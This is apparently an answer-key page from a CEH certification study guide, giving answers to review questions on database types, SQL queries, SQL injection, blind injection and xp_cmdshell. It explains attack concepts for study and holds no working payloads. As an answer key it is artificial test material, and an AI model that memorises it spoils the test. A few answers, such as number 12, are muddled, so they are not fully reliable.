CEH

432 Appendix A ■ Answers to Review Questions

3. B. Firewalls can prevent the scanning of systems and the probing or discovery of
   a database.


4. A. Databases can be a victim of source code exploits, depending on their configuration and
   design.


5. A. A hierarchical database is another alternative to the popular relational database
   structure.


6. C. CGI is a scripting language that is designed to be processed on the server side before the
   results are provided to the client.


7. C. SQLping is used to audit databases and help identify issues that may be of concern or
   problematic.


8. B. Browsers do not render hidden fields, but these fields can be viewed if you use the
   browser’s ability to view source code.


9. B. SQL injection attacks are made possible through improper input validation, thus
   allowing bogus commands to be issued to a database and processed.


10. B. SQL injection can be used to attach databases.


11. C. The xp_cmdshell command is available in all versions of SQL Server and can be used
    to open a command shell. The command has been disabled in current versions of the
    product, though is still available to be enabled.


12. B,C, D. The SELECT command is used to craft SQL queries. While WHERE and FROM are used
    to customize queries to get more desirable results.


13. B. The WHERE statement limits the results of a SQL query.


14. D. The drop table command is used to remove a table from a database. This command
    deletes a table from the database.


15. C. SQL injection operates at the database layer and attacks databases directly.


16. A. A row is a name for a line in a database typically associated with a record.


17. C. A distributed database is one that has its information spread across many different
    systems that are networked together and linked via code.


18. B. A relational database uses complex relationships between tables to describe data in an
    understandable format.


19. D. Error messages can reveal success of an attack, failure of an attack, structure of a
    database, as well as configuration and other information.


20. A. When error messages are not descriptive or not available, a blind SQL injection attack
    can be used to ascertain information from performance or indirect observations.

bapp01.indd 432 22-07-2014 10:56:37